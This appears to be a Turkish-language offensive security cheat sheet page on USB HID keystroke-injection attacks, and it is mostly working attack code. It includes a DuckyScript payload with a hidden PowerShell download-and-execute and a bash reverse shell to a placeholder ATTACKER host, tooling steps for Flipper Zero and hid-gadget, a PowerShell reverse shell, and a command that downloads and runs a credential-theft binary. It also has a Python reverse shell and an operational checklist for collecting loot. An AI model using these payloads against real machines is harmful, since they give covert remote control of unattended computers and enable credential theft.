Skip to content

USB HID Saldırıları

hardware hid

USB HID cihaz klavye gibi görünür; host sürücü sormadan tuş vuruşu enjekte eder. Açık oturum veya kısa kilitsiz pencerede reverse shell / credential theft zinciri kurulur.

  1. Hedef OS ve klavye düzenini doğrula (TR-Q / EN-US payload farklıdır).

  2. Kısa, güvenilir bir ilk stage seç (PowerShell / bash one-liner).

  3. Cihaz tak → delay → inject → listener’da bağlantıyı doğrula.

  4. İkinci stage ile TTY/loot taşı; HID’yi gerekirse tekrar kullanma.

DELAY 1000
GUI r
DELAY 300
STRING powershell -w hidden -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/i.ps1')"
ENTER
DELAY 800
CTRL-ALT t
DELAY 400
STRING bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'
ENTER
Terminal window
duckencoder -i payload.txt -o inject.bin
Flipper Zero → Bad USB → uygun layout .txt
Terminal window
# Kali / Atakboard benzeri
hid-gadget-test /dev/hidg0 keyboard
Terminal window
echo 'string bash -i >& /dev/tcp/ATTACKER/443 0>&1' | hid-gadget-test /dev/hidg0 keyboard
Terminal window
powershell -nop -w hidden -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER',443);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}"
Terminal window
nc -lvnp 443
Terminal window
# Credential / loot sonrası
iwr http://ATTACKER/sharp.exe -OutFile $env:TEMP\s.exe; Start-Process $env:TEMP\s.exe
Terminal window
bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'
Terminal window
python3 -c 'import socket,subprocess,os
Terminal window
s=socket.socket()
Terminal window
s.connect(("ATTACKER",443))
Terminal window
os.dup2(s.fileno(),0)
Terminal window
os.dup2(s.fileno(),1)
Terminal window
os.dup2(s.fileno(),2)
Terminal window
subprocess.call(["/bin/sh","-i"])'
Layout: TR klavyede " ve / karakterleri EN payload'ı bozar — layout'a göre encode et
[ ] OS + klavye layout doğrulandı
[ ] Listener hazır
[ ] Delay yeterli (login animasyonu)
[ ] İlk stage bağlandı
[ ] İkinci stage / loot alındı